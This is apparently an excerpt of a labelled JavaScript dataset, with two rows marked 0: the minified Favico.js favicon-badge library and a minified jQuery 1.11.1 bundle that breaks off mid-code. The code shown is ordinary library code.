label
int64
0
1
text
stringlengths
101
11.8M
0
/** * @license MIT * @fileOverview Favico animations * @author Miroslav Magda, http://blog.ejci.net * @version 0.3.10 */ !function(){var e=function(e){"use strict";function t(e){if(e.paused||e.ended||g)return!1;try{f.clearRect(0,0,s,l),f.drawImage(e,0,0,s,l)}catch(o){}p=setTimeout(function(){t(e)},S.duration),O.setIcon(h)}function o(e){var t=/^#?([a-f\d])([a-f\d])([a-f\d])$/i;e=e.replace(t,function(e,t,o,n){return t+t+o+o+n+n});var o=/^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(e);return o?{r:parseInt(o[1],16),g:parseInt(o[2],16),b:parseInt(o[3],16)}:!1}function n(e,t){var o,n={};for(o in e)n[o]=e[o];for(o in t)n[o]=t[o];return n}function r(){return b.hidden||b.msHidden||b.webkitHidden||b.mozHidden}e=e?e:{};var i,a,l,s,h,f,c,d,u,y,w,g,x,m,p,b,v={bgColor:"#d00",textColor:"#fff",fontFamily:"sans-serif",fontStyle:"bold",type:"circle",position:"down",animation:"slide",elementId:!1,dataUrl:!1,win:window};x={},x.ff="undefined"!=typeof InstallTrigger,x.chrome=!!window.chrome,x.opera=!!window.opera||navigator.userAgent.indexOf("Opera")>=0,x.ie=/*@cc_on!@*/!1,x.safari=Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor")>0,x.supported=x.chrome||x.ff||x.opera;var C=[];w=function(){},d=g=!1;var E=function(){i=n(v,e),i.bgColor=o(i.bgColor),i.textColor=o(i.textColor),i.position=i.position.toLowerCase(),i.animation=S.types[""+i.animation]?i.animation:v.animation,b=i.win.document;var t=i.position.indexOf("up")>-1,r=i.position.indexOf("left")>-1;if(t||r)for(var d=0;d<S.types[""+i.animation].length;d++){var u=S.types[""+i.animation][d];t&&(u.y=u.y<.6?u.y-.4:u.y-2*u.y+(1-u.w)),r&&(u.x=u.x<.6?u.x-.4:u.x-2*u.x+(1-u.h)),S.types[""+i.animation][d]=u}i.type=A[""+i.type]?i.type:v.type,a=O.getIcon(),h=document.createElement("canvas"),c=document.createElement("img"),a.hasAttribute("href")?(c.setAttribute("crossOrigin","anonymous"),c.onload=function(){l=c.height>0?c.height:32,s=c.width>0?c.width:32,h.height=l,h.width=s,f=h.getContext("2d"),M.ready()},c.setAttribute("src",a.getAttribute("href"))):(c.onload=function(){l=32,s=32,c.height=l,c.width=s,h.height=l,h.width=s,f=h.getContext("2d"),M.ready()},c.setAttribute("src",""))},M={};M.ready=function(){d=!0,M.reset(),w()},M.reset=function(){d&&(C=[],u=!1,y=!1,f.clearRect(0,0,s,l),f.drawImage(c,0,0,s,l),O.setIcon(h),window.clearTimeout(m),window.clearTimeout(p))},M.start=function(){if(d&&!y){var e=function(){u=C[0],y=!1,C.length>0&&(C.shift(),M.start())};if(C.length>0){y=!0;var t=function(){["type","animation","bgColor","textColor","fontFamily","fontStyle"].forEach(function(e){e in C[0].options&&(i[e]=C[0].options[e])}),S.run(C[0].options,function(){e()},!1)};u?S.run(u.options,function(){t()},!0):t()}}};var A={},I=function(e){return e.n="number"==typeof e.n?Math.abs(0|e.n):e.n,e.x=s*e.x,e.y=l*e.y,e.w=s*e.w,e.h=l*e.h,e.len=(""+e.n).length,e};A.circle=function(e){e=I(e);var t=!1;2===e.len?(e.x=e.x-.4*e.w,e.w=1.4*e.w,t=!0):e.len>=3&&(e.x=e.x-.65*e.w,e.w=1.65*e.w,t=!0),f.clearRect(0,0,s,l),f.drawImage(c,0,0,s,l),f.beginPath(),f.font=i.fontStyle+" "+Math.floor(e.h*(e.n>99?.85:1))+"px "+i.fontFamily,f.textAlign="center",t?(f.moveTo(e.x+e.w/2,e.y),f.lineTo(e.x+e.w-e.h/2,e.y),f.quadraticCurveTo(e.x+e.w,e.y,e.x+e.w,e.y+e.h/2),f.lineTo(e.x+e.w,e.y+e.h-e.h/2),f.quadraticCurveTo(e.x+e.w,e.y+e.h,e.x+e.w-e.h/2,e.y+e.h),f.lineTo(e.x+e.h/2,e.y+e.h),f.quadraticCurveTo(e.x,e.y+e.h,e.x,e.y+e.h-e.h/2),f.lineTo(e.x,e.y+e.h/2),f.quadraticCurveTo(e.x,e.y,e.x+e.h/2,e.y)):f.arc(e.x+e.w/2,e.y+e.h/2,e.h/2,0,2*Math.PI),f.fillStyle="rgba("+i.bgColor.r+","+i.bgColor.g+","+i.bgColor.b+","+e.o+")",f.fill(),f.closePath(),f.beginPath(),f.stroke(),f.fillStyle="rgba("+i.textColor.r+","+i.textColor.g+","+i.textColor.b+","+e.o+")","number"==typeof e.n&&e.n>999?f.fillText((e.n>9999?9:Math.floor(e.n/1e3))+"k+",Math.floor(e.x+e.w/2),Math.floor(e.y+e.h-.2*e.h)):f.fillText(e.n,Math.floor(e.x+e.w/2),Math.floor(e.y+e.h-.15*e.h)),f.closePath()},A.rectangle=function(e){e=I(e);var t=!1;2===e.len?(e.x=e.x-.4*e.w,e.w=1.4*e.w,t=!0):e.len>=3&&(e.x=e.x-.65*e.w,e.w=1.65*e.w,t=!0),f.clearRect(0,0,s,l),f.drawImage(c,0,0,s,l),f.beginPath(),f.font=i.fontStyle+" "+Math.floor(e.h*(e.n>99?.9:1))+"px "+i.fontFamily,f.textAlign="center",f.fillStyle="rgba("+i.bgColor.r+","+i.bgColor.g+","+i.bgColor.b+","+e.o+")",f.fillRect(e.x,e.y,e.w,e.h),f.fillStyle="rgba("+i.textColor.r+","+i.textColor.g+","+i.textColor.b+","+e.o+")","number"==typeof e.n&&e.n>999?f.fillText((e.n>9999?9:Math.floor(e.n/1e3))+"k+",Math.floor(e.x+e.w/2),Math.floor(e.y+e.h-.2*e.h)):f.fillText(e.n,Math.floor(e.x+e.w/2),Math.floor(e.y+e.h-.15*e.h)),f.closePath()};var T=function(e,t){t=("string"==typeof t?{animation:t}:t)||{},w=function(){try{if("number"==typeof e?e>0:""!==e){var n={type:"badge",options:{n:e}};if("animation"in t&&S.types[""+t.animation]&&(n.options.animation=""+t.animation),"type"in t&&A[""+t.type]&&(n.options.type=""+t.type),["bgColor","textColor"].forEach(function(e){e in t&&(n.options[e]=o(t[e]))}),["fontStyle","fontFamily"].forEach(function(e){e in t&&(n.options[e]=t[e])}),C.push(n),C.length>100)throw new Error("Too many badges requests in queue.");M.start()}else M.reset()}catch(r){throw new Error("Error setting badge. Message: "+r.message)}},d&&w()},U=function(e){w=function(){try{var t=e.width,o=e.height,n=document.createElement("img"),r=o/l>t/s?t/s:o/l;n.setAttribute("crossOrigin","anonymous"),n.onload=function(){f.clearRect(0,0,s,l),f.drawImage(n,0,0,s,l),O.setIcon(h)},n.setAttribute("src",e.getAttribute("src")),n.height=o/r,n.width=t/r}catch(i){throw new Error("Error setting image. Message: "+i.message)}},d&&w()},R=function(e){w=function(){try{if("stop"===e)return g=!0,M.reset(),void(g=!1);e.addEventListener("play",function(){t(this)},!1)}catch(o){throw new Error("Error setting video. Message: "+o.message)}},d&&w()},L=function(e){if(window.URL&&window.URL.createObjectURL||(window.URL=window.URL||{},window.URL.createObjectURL=function(e){return e}),x.supported){var o=!1;navigator.getUserMedia=navigator.getUserMedia||navigator.oGetUserMedia||navigator.msGetUserMedia||navigator.mozGetUserMedia||navigator.webkitGetUserMedia,w=function(){try{if("stop"===e)return g=!0,M.reset(),void(g=!1);o=document.createElement("video"),o.width=s,o.height=l,navigator.getUserMedia({video:!0,audio:!1},function(e){o.src=URL.createObjectURL(e),o.play(),t(o)},function(){})}catch(n){throw new Error("Error setting webcam. Message: "+n.message)}},d&&w()}},O={};O.getIcon=function(){var e=!1,t=function(){for(var e=b.getElementsByTagName("head")[0].getElementsByTagName("link"),t=e.length,o=t-1;o>=0;o--)if(/(^|\s)icon(\s|$)/i.test(e[o].getAttribute("rel")))return e[o];return!1};return i.element?e=i.element:i.elementId?(e=b.getElementById(i.elementId),e.setAttribute("href",e.getAttribute("src"))):(e=t(),e===!1&&(e=b.createElement("link"),e.setAttribute("rel","icon"),b.getElementsByTagName("head")[0].appendChild(e))),e.setAttribute("type","image/png"),e},O.setIcon=function(e){var t=e.toDataURL("image/png");if(i.dataUrl&&i.dataUrl(t),i.element)i.element.setAttribute("href",t),i.element.setAttribute("src",t);else if(i.elementId){var o=b.getElementById(i.elementId);o.setAttribute("href",t),o.setAttribute("src",t)}else if(x.ff||x.opera){var n=a;a=b.createElement("link"),x.opera&&a.setAttribute("rel","icon"),a.setAttribute("rel","icon"),a.setAttribute("type","image/png"),b.getElementsByTagName("head")[0].appendChild(a),a.setAttribute("href",t),n.parentNode&&n.parentNode.removeChild(n)}else a.setAttribute("href",t)};var S={};return S.duration=40,S.types={},S.types.fade=[{x:.4,y:.4,w:.6,h:.6,o:0},{x:.4,y:.4,w:.6,h:.6,o:.1},{x:.4,y:.4,w:.6,h:.6,o:.2},{x:.4,y:.4,w:.6,h:.6,o:.3},{x:.4,y:.4,w:.6,h:.6,o:.4},{x:.4,y:.4,w:.6,h:.6,o:.5},{x:.4,y:.4,w:.6,h:.6,o:.6},{x:.4,y:.4,w:.6,h:.6,o:.7},{x:.4,y:.4,w:.6,h:.6,o:.8},{x:.4,y:.4,w:.6,h:.6,o:.9},{x:.4,y:.4,w:.6,h:.6,o:1}],S.types.none=[{x:.4,y:.4,w:.6,h:.6,o:1}],S.types.pop=[{x:1,y:1,w:0,h:0,o:1},{x:.9,y:.9,w:.1,h:.1,o:1},{x:.8,y:.8,w:.2,h:.2,o:1},{x:.7,y:.7,w:.3,h:.3,o:1},{x:.6,y:.6,w:.4,h:.4,o:1},{x:.5,y:.5,w:.5,h:.5,o:1},{x:.4,y:.4,w:.6,h:.6,o:1}],S.types.popFade=[{x:.75,y:.75,w:0,h:0,o:0},{x:.65,y:.65,w:.1,h:.1,o:.2},{x:.6,y:.6,w:.2,h:.2,o:.4},{x:.55,y:.55,w:.3,h:.3,o:.6},{x:.5,y:.5,w:.4,h:.4,o:.8},{x:.45,y:.45,w:.5,h:.5,o:.9},{x:.4,y:.4,w:.6,h:.6,o:1}],S.types.slide=[{x:.4,y:1,w:.6,h:.6,o:1},{x:.4,y:.9,w:.6,h:.6,o:1},{x:.4,y:.9,w:.6,h:.6,o:1},{x:.4,y:.8,w:.6,h:.6,o:1},{x:.4,y:.7,w:.6,h:.6,o:1},{x:.4,y:.6,w:.6,h:.6,o:1},{x:.4,y:.5,w:.6,h:.6,o:1},{x:.4,y:.4,w:.6,h:.6,o:1}],S.run=function(e,t,o,a){var l=S.types[r()?"none":i.animation];return a=o===!0?"undefined"!=typeof a?a:l.length-1:"undefined"!=typeof a?a:0,t=t?t:function(){},a<l.length&&a>=0?(A[i.type](n(e,l[a])),m=setTimeout(function(){o?a-=1:a+=1,S.run(e,t,o,a)},S.duration),O.setIcon(h),void 0):void t()},E(),{badge:T,video:R,image:U,webcam:L,reset:M.reset,browser:{supported:x.supported}}};"undefined"!=typeof define&&define.amd?define([],function(){return e}):"undefined"!=typeof module&&module.exports?module.exports=e:this.Favico=e}();
0
function Fryr(e){return this.init(e)}!function(e,t){"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){function n(e){var t=e.length,n=re.type(e);return"function"===n||re.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e}function i(e,t,n){if(re.isFunction(t))return re.grep(e,function(e,i){return!!t.call(e,i,e)!==n});if(t.nodeType)return re.grep(e,function(e){return e===t!==n});if("string"==typeof t){if(pe.test(t))return re.filter(t,e,n);t=re.filter(t,e)}return re.grep(e,function(e){return re.inArray(e,t)>=0!==n})}function r(e,t){do e=e[t];while(e&&1!==e.nodeType);return e}function o(e){var t=be[e]={};return re.each(e.match(ye)||[],function(e,n){t[n]=!0}),t}function s(){he.addEventListener?(he.removeEventListener("DOMContentLoaded",a,!1),e.removeEventListener("load",a,!1)):(he.detachEvent("onreadystatechange",a),e.detachEvent("onload",a))}function a(){(he.addEventListener||"load"===event.type||"complete"===he.readyState)&&(s(),re.ready())}function l(e,t,n){if(void 0===n&&1===e.nodeType){var i="data-"+t.replace(Ee,"-$1").toLowerCase();if(n=e.getAttribute(i),"string"==typeof n){try{n="true"===n?!0:"false"===n?!1:"null"===n?null:+n+""===n?+n:Te.test(n)?re.parseJSON(n):n}catch(r){}re.data(e,t,n)}else n=void 0}return n}function d(e){var t;for(t in e)if(("data"!==t||!re.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}function c(e,t,n,i){if(re.acceptData(e)){var r,o,s=re.expando,a=e.nodeType,l=a?re.cache:e,d=a?e[s]:e[s]&&s;if(d&&l[d]&&(i||l[d].data)||void 0!==n||"string"!=typeof t)return d||(d=a?e[s]=$.pop()||re.guid++:s),l[d]||(l[d]=a?{}:{toJSON:re.noop}),"object"!=typeof t&&"function"!=typeof t||(i?l[d]=re.extend(l[d],t):l[d].data=re.extend(l[d].data,t)),o=l[d],i||(o.data||(o.data={}),o=o.data),void 0!==n&&(o[re.camelCase(t)]=n),"string"==typeof t?(r=o[t],null==r&&(r=o[re.camelCase(t)])):r=o,r}}function u(e,t,n){if(re.acceptData(e)){var i,r,o=e.nodeType,s=o?re.cache:e,a=o?e[re.expando]:re.expando;if(s[a]){if(t&&(i=n?s[a]:s[a].data)){re.isArray(t)?t=t.concat(re.map(t,re.camelCase)):t in i?t=[t]:(t=re.camelCase(t),t=t in i?[t]:t.split(" ")),r=t.length;for(;r--;)delete i[t[r]];if(n?!d(i):!re.isEmptyObject(i))return}(n||(delete s[a].data,d(s[a])))&&(o?re.cleanData([e],!0):ne.deleteExpando||s!=s.window?delete s[a]:s[a]=null)}}}function p(){return!0}function f(){return!1}function h(){try{return he.activeElement}catch(e){}}function m(e){var t=De.split("|"),n=e.createDocumentFragment();if(n.createElement)for(;t.length;)n.createElement(t.pop());return n}function g(e,t){var n,i,r=0,o=typeof e.getElementsByTagName!==xe?e.getElementsByTagName(t||"*"):typeof e.querySelectorAll!==xe?e.querySelectorAll(t||"*"):void 0;if(!o)for(o=[],n=e.childNodes||e;null!=(i=n[r]);r++)!t||re.nodeName(i,t)?o.push(i):re.merge(o,g(i,t));return void 0===t||t&&re.nodeName(e,t)?re.merge([e],o):o}function A(e){Se.test(e.type)&&(e.defaultChecked=e.checked)}function v(e,t){return re.nodeName(e,"table")&&re.nodeName(11!==t.nodeType?t:t.firstChild,"tr")?e.getElementsByTagName("tbody")[0]||e.appendChild(e.ownerDocument.createElement("tbody")):e}function y(e){return e.type=(null!==re.find.attr(e,"type"))+"/"+e.type,e}function b(e){var t=Ge.exec(e.type);return t?e.type=t[1]:e.removeAttribute("type"),e}function w(e,t){for(var n,i=0;null!=(n=e[i]);i++)re._data(n,"globalEval",!t||re._data(t[i],"globalEval"))}function _(e,t){if(1===t.nodeType&&re.hasData(e)){var n,i,r,o=re._data(e),s=re._data(t,o),a=o.events;if(a){delete s.handle,s.events={};for(n in a)for(i=0,r=a[n].length;r>i;i++)re.event.add(t,n,a[n][i])}s.data&&(s.data=re.extend({},s.data))}}function x(e,t){var n,i,r;if(1===t.nodeType){if(n=t.nodeName.toLowerCase(),!ne.noCloneEvent&&t[re.expando]){r=re._data(t);for(i in r.events)re.removeEvent(t,i,r.handle);t.removeAttribute(re.expando)}"script"===n&&t.text!==e.text?(y(t).text=e.text,b(t)):"object"===n?(t.parentNode&&(t.outerHTML=e.outerHTML),ne.html5Clone&&e.innerHTML&&!re.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):"input"===n&&Se.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):"option"===n?t.defaultSelected=t.selected=e.defaultSelected:"input"!==n&&"textarea"!==n||(t.defaultValue=e.defaultValue)}}function T(t,n){var i,r=re(n.createElement(t)).appendTo(n.body),o=e.getDefaultComputedStyle&&(i=e.getDefaultComputedStyle(r[0]))?i.display:re.css(r[0],"display");return r.detach(),o}function E(e){var t=he,n=Ke[e];return n||(n=T(e,t),"none"!==n&&n||(Xe=(Xe||re("<iframe frameborder='0' width='0' height='0'/>")).appendTo(t.documentElement),t=(Xe[0].contentWindow||Xe[0].contentDocument).document,t.write(),t.close(),n=T(e,t),Xe.detach()),Ke[e]=n),n}function C(e,t){return{get:function(){var n=e();if(null!=n)return n?void delete this.get:(this.get=t).apply(this,arguments)}}}function M(e,t){if(t in e)return t;for(var n=t.charAt(0).toUpperCase()+t.slice(1),i=t,r=pt.length;r--;)if(t=pt[r]+n,t in e)return t;return i}function k(e,t){for(var n,i,r,o=[],s=0,a=e.length;a>s;s++)i=e[s],i.style&&(o[s]=re._data(i,"olddisplay"),n=i.style.display,t?(o[s]||"none"!==n||(i.style.display=""),""===i.style.display&&ke(i)&&(o[s]=re._data(i,"olddisplay",E(i.nodeName)))):(r=ke(i),(n&&"none"!==n||!r)&&re._data(i,"olddisplay",r?n:re.css(i,"display"))));for(s=0;a>s;s++)i=e[s],i.style&&(t&&"none"!==i.style.display&&""!==i.style.display||(i.style.display=t?o[s]||"":"none"));return e}function z(e,t,n){var i=lt.exec(t);return i?Math.max(0,i[1]-(n||0))+(i[2]||"px"):t}function S(e,t,n,i,r){for(var o=n===(i?"border":"content")?4:"width"===t?1:0,s=0;4>o;o+=2)"margin"===n&&(s+=re.css(e,n+Me[o],!0,r)),i?("content"===n&&(s-=re.css(e,"padding"+Me[o],!0,r)),"margin"!==n&&(s-=re.css(e,"border"+Me[o]+"Width",!0,r))):(s+=re.css(e,"padding"+Me[o],!0,r),"padding"!==n&&(s+=re.css(e,"border"+Me[o]+"Width",!0,r)));return s}function B(e,t,n){var i=!0,r="width"===t?e.offsetWidth:e.offsetHeight,o=et(e),s=ne.boxSizing&&"border-box"===re.css(e,"boxSizing",!1,o);if(0>=r||null==r){if(r=tt(e,t,o),(0>r||null==r)&&(r=e.style[t]),it.test(r))return r;i=s&&(ne.boxSizingReliable()||r===e.style[t]),r=parseFloat(r)||0}return r+S(e,t,n||(s?"border":"content"),i,o)+"px"}function N(e,t,n,i,r){return new N.prototype.init(e,t,n,i,r)}function P(){return setTimeout(function(){ft=void 0}),ft=re.now()}function j(e,t){var n,i={height:e},r=0;for(t=t?1:0;4>r;r+=2-t)n=Me[r],i["margin"+n]=i["padding"+n]=e;return t&&(i.opacity=i.width=e),i}function R(e,t,n){for(var i,r=(yt[t]||[]).concat(yt["*"]),o=0,s=r.length;s>o;o++)if(i=r[o].call(n,t,e))return i}function D(e,t,n){var i,r,o,s,a,l,d,c,u=this,p={},f=e.style,h=e.nodeType&&ke(e),m=re._data(e,"fxshow");n.queue||(a=re._queueHooks(e,"fx"),null==a.unqueued&&(a.unqueued=0,l=a.empty.fire,a.empty.fire=function(){a.unqueued||l()}),a.unqueued++,u.always(function(){u.always(function(){a.unqueued--,re.queue(e,"fx").length||a.empty.fire()})})),1===e.nodeType&&("height"in t||"width"in t)&&(n.overflow=[f.overflow,f.overflowX,f.overflowY],d=re.css(e,"display"),c="none"===d?re._data(e,"olddisplay")||E(e.nodeName):d,"inline"===c&&"none"===re.css(e,"float")&&(ne.inlineBlockNeedsLayout&&"inline"!==E(e.nodeName)?f.zoom=1:f.display="inline-block")),n.overflow&&(f.overflow="hidden",ne.shrinkWrapBlocks()||u.always(function(){f.overflow=n.overflow[0],f.overflowX=n.overflow[1],f.overflowY=n.overflow[2]}));for(i in t)if(r=t[i],mt.exec(r)){if(delete t[i],o=o||"toggle"===r,r===(h?"hide":"show")){if("show"!==r||!m||void 0===m[i])continue;h=!0}p[i]=m&&m[i]||re.style(e,i)}else d=void 0;if(re.isEmptyObject(p))"inline"===("none"===d?E(e.nodeName):d)&&(f.display=d);else{m?"hidden"in m&&(h=m.hidden):m=re._data(e,"fxshow",{}),o&&(m.hidden=!h),h?re(e).show():u.done(function(){re(e).hide()}),u.done(function(){var t;re._removeData(e,"fxshow");for(t in p)re.style(e,t,p[t])});for(i in p)s=R(h?m[i]:0,i,u),i in m||(m[i]=s.start,h&&(s.end=s.start,s.start="width"===i||"height"===i?1:0))}}function F(e,t){var n,i,r,o,s;for(n in e)if(i=re.camelCase(n),r=t[i],o=e[n],re.isArray(o)&&(r=o[1],o=e[n]=o[0]),n!==i&&(e[i]=o,delete e[n]),s=re.cssHooks[i],s&&"expand"in s){o=s.expand(o),delete e[i];for(n in o)n in e||(e[n]=o[n],t[n]=r)}else t[i]=r}function I(e,t,n){var i,r,o=0,s=vt.length,a=re.Deferred().always(function(){delete l.elem}),l=function(){if(r)return!1;for(var t=ft||P(),n=Math.max(0,d.startTime+d.duration-t),i=n/d.duration||0,o=1-i,s=0,l=d.tweens.length;l>s;s++)d.tweens[s].run(o);return a.notifyWith(e,[d,o,n]),1>o&&l?n:(a.resolveWith(e,[d]),!1)},d=a.promise({elem:e,props:re.extend({},t),opts:re.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:ft||P(),duration:n.duration,tweens:[],createTween:function(t,n){var i=re.Tween(e,d.opts,t,n,d.opts.specialEasing[t]||d.opts.easing);return d.tweens.push(i),i},stop:function(t){var n=0,i=t?d.tweens.length:0;if(r)return this;for(r=!0;i>n;n++)d.tweens[n].run(1);return t?a.resolveWith(e,[d,t]):a.rejectWith(e,[d,t]),this}}),c=d.props;for(F(c,d.opts.specialEasing);s>o;o++)if(i=vt[o].call(d,e,c,d.opts))return i;return re.map(c,R,d),re.isFunction(d.opts.start)&&d.opts.start.call(e,d),re.fx.timer(re.extend(l,{elem:e,anim:d,queue:d.opts.queue})),d.progress(d.opts.progress).done(d.opts.done,d.opts.complete).fail(d.opts.fail).always(d.opts.always)}function L(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var i,r=0,o=t.toLowerCase().match(ye)||[];if(re.isFunction(n))for(;i=o[r++];)"+"===i.charAt(0)?(i=i.slice(1)||"*",(e[i]=e[i]||[]).unshift(n)):(e[i]=e[i]||[]).push(n)}}function H(e,t,n,i){function r(a){var l;return o[a]=!0,re.each(e[a]||[],function(e,a){var d=a(t,n,i);return"string"!=typeof d||s||o[d]?s?!(l=d):void 0:(t.dataTypes.unshift(d),r(d),!1)}),l}var o={},s=e===Wt;return r(t.dataTypes[0])||!o["*"]&&r("*")}function O(e,t){var n,i,r=re.ajaxSettings.flatOptions||{};for(i in t)void 0!==t[i]&&((r[i]?e:n||(n={}))[i]=t[i]);return n&&re.extend(!0,e,n),e}function Q(e,t,n){for(var i,r,o,s,a=e.contents,l=e.dataTypes;"*"===l[0];)l.shift(),void 0===r&&(r=e.mimeType||t.getResponseHeader("Content-Type"));if(r)for(s in a)if(a[s]&&a[s].test(r)){l.unshift(s);break}if(l[0]in n)o=l[0];else{for(s in n){if(!l[0]||e.converters[s+" "+l[0]]){o=s;break}i||(i=s)}o=o||i}return o?(o!==l[0]&&l.unshift(o),n[o]):void 0}function W(e,t,n,i){var r,o,s,a,l,d={},c=e.dataTypes.slice();if(c[1])for(s in e.converters)d[s.toLowerCase()]=e.converters[s];for(o=c.shift();o;)if(e.responseFields[o]&&(n[e.responseFields[o]]=t),!l&&i&&e.dataFilter&&(t=e.dataFilter(t,e.dataType)),l=o,o=c.shift())if("*"===o)o=l;else if("*"!==l&&l!==o){if(s=d[l+" "+o]||d["* "+o],!s)for(r in d)if(a=r.split(" "),a[1]===o&&(s=d[l+" "+a[0]]||d["* "+a[0]])){s===!0?s=d[r]:d[r]!==!0&&(o=a[0],c.unshift(a[1]));break}if(s!==!0)if(s&&e["throws"])t=s(t);else try{t=s(t)}catch(u){return{state:"parsererror",error:s?u:"No conversion from "+l+" to "+o}}}return{state:"success",data:t}}function q(e,t,n,i){var r;if(re.isArray(t))re.each(t,function(t,r){n||Gt.test(e)?i(e,r):q(e+"["+("object"==typeof r?t:"")+"]",r,n,i)});else if(n||"object"!==re.type(t))i(e,t);else for(r in t)q(e+"["+r+"]",t[r],n,i)}function U(){try{return new e.XMLHttpRequest}catch(t){}}function V(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}function G(e){return re.isWindow(e)?e:9===e.nodeType?e.defaultView||e.parentWindow:!1}var $=[],Y=$.slice,Z=$.concat,J=$.push,X=$.indexOf,K={},ee=K.toString,te=K.hasOwnProperty,ne={},ie="1.11.1",re=function(e,t){return new re.fn.init(e,t)},oe=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,se=/^-ms-/,ae=/-([\da-z])/gi,le=function(e,t){return t.toUpperCase()};re.fn=re.prototype={jquery:ie,constructor:re,selector:"",length:0,toArray:function(){return Y.call(this)},get:function(e){return null!=e?0>e?this[e+this.length]:this[e]:Y.call(this)},pushStack:function(e){var t=re.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return re.each(this,e,t)},map:function(e){return this.pushStack(re.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(Y.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:J,sort:$.sort,splice:$.splice},re.extend=re.fn.extend=function(){var e,t,n,i,r,o,s=arguments[0]||{},a=1,l=arguments.length,d=!1;for("boolean"==typeof s&&(d=s,s=arguments[a]||{},a++),"object"==typeof s||re.isFunction(s)||(s={}),a===l&&(s=this,a--);l>a;a++)if(null!=(r=arguments[a]))for(i in r)e=s[i],n=r[i],s!==n&&(d&&n&&(re.isPlainObject(n)||(t=re.isArray(n)))?(t?(t=!1,o=e&&re.isArray(e)?e:[]):o=e&&re.isPlainObject(e)?e:{},s[i]=re.extend(d,o,n)):void 0!==n&&(s[i]=n));return s},re.extend({expando:"jQuery"+(ie+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isFunction:function(e){return"function"===re.type(e)},isArray:Array.isArray||function(e){return"array"===re.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!re.isArray(e)&&e-parseFloat(e)>=0},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},isPlainObject:function(e){var t;if(!e||"object"!==re.type(e)||e.nodeType||re.isWindow(e))return!1;try{if(e.constructor&&!te.call(e,"constructor")&&!te.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}if(ne.ownLast)for(t in e)return te.call(e,t);for(t in e);return void 0===t||te.call(e,t)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?K[ee.call(e)]||"object":typeof e},globalEval:function(t){t&&re.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(se,"ms-").replace(ae,le)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,i){var r,o=0,s=e.length,a=n(e);if(i){if(a)for(;s>o&&(r=t.apply(e[o],i),r!==!1);o++);else for(o in e)if(r=t.apply(e[o],i),r===!1)break}else if(a)for(;s>o&&(r=t.call(e[o],o,e[o]),r!==!1);o++);else for(o in e)if(r=t.call(e[o],o,e[o]),r===!1)break;return e},trim:function(e){return null==e?"":(e+"").replace(oe,"")},makeArray:function(e,t){var i=t||[];return null!=e&&(n(Object(e))?re.merge(i,"string"==typeof e?[e]:e):J.call(i,e)),i},inArray:function(e,t,n){var i;if(t){if(X)return X.call(t,e,n);for(i=t.length,n=n?0>n?Math.max(0,i+n):n:0;i>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,t){for(var n=+t.length,i=0,r=e.length;n>i;)e[r++]=t[i++];if(n!==n)for(;void 0!==t[i];)e[r++]=t[i++];return e.length=r,e},grep:function(e,t,n){for(var i,r=[],o=0,s=e.length,a=!n;s>o;o++)i=!t(e[o],o),i!==a&&r.push(e[o]);return r},map:function(e,t,i){var r,o=0,s=e.length,a=n(e),l=[];if(a)for(;s>o;o++)r=t(e[o],o,i),null!=r&&l.push(r);else for(o in e)r=t(e[o],o,i),null!=r&&l.push(r);return Z.apply([],l)},guid:1,proxy:function(e,t){var n,i,r;return"string"==typeof t&&(r=e[t],t=e,e=r),re.isFunction(e)?(n=Y.call(arguments,2),i=function(){return e.apply(t||this,n.concat(Y.call(arguments)))},i.guid=e.guid=e.guid||re.guid++,i):void 0},now:function(){return+new Date},support:ne}),re.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){K["[object "+t+"]"]=t.toLowerCase()});var de=function(e){function t(e,t,n,i){var r,o,s,a,l,d,u,f,h,m;if((t?t.ownerDocument||t:H)!==N&&B(t),t=t||N,n=n||[],!e||"string"!=typeof e)return n;if(1!==(a=t.nodeType)&&9!==a)return[];if(j&&!i){if(r=ve.exec(e))if(s=r[1]){if(9===a){if(o=t.getElementById(s),!o||!o.parentNode)return n;if(o.id===s)return n.push(o),n}else if(t.ownerDocument&&(o=t.ownerDocument.getElementById(s))&&I(t,o)&&o.id===s)return n.push(o),n}else{if(r[2])return K.apply(n,t.getElementsByTagName(e)),n;if((s=r[3])&&w.getElementsByClassName&&t.getElementsByClassName)return K.apply(n,t.getElementsByClassName(s)),n}if(w.qsa&&(!R||!R.test(e))){if(f=u=L,h=t,m=9===a&&e,1===a&&"object"!==t.nodeName.toLowerCase()){for(d=E(e),(u=t.getAttribute("id"))?f=u.replace(be,"\\$&"):t.setAttribute("id",f),f="[id='"+f+"'] ",l=d.length;l--;)d[l]=f+p(d[l]);h=ye.test(e)&&c(t.parentNode)||t,m=d.join(",")}if(m)try{return K.apply(n,h.querySelectorAll(m)),n}catch(g){}finally{u||t.removeAttribute("id")}}}return 